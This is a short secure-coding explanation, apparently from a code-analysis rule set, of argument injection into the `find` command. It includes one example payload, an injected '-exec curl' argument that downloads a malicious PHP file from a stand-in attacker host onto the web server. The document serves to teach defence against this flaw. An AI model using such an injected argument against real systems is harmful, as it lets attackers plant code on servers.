16 lines
723 B
Plaintext
16 lines
723 B
Plaintext
The following code uses the `find` command and expects the user to enter the
|
|
name of a file to find on the system.
|
|
|
|
It is vulnerable to argument injection because untrusted data is
|
|
inserted in the arguments of a process call without prior validation or
|
|
sanitization. +
|
|
Here, the application ignores that a user-submitted parameter might contain
|
|
special characters that will tamper with the expected system command behavior.
|
|
|
|
In this particular case, an attacker might add arbitrary arguments to the `find`
|
|
command for malicious purposes. For example, the following payload will download
|
|
malicious software on the application's hosting server.
|
|
|
|
----
|
|
-exec curl -o /var/www/html/ http://evil.example.org/malicious.php ;
|
|
---- |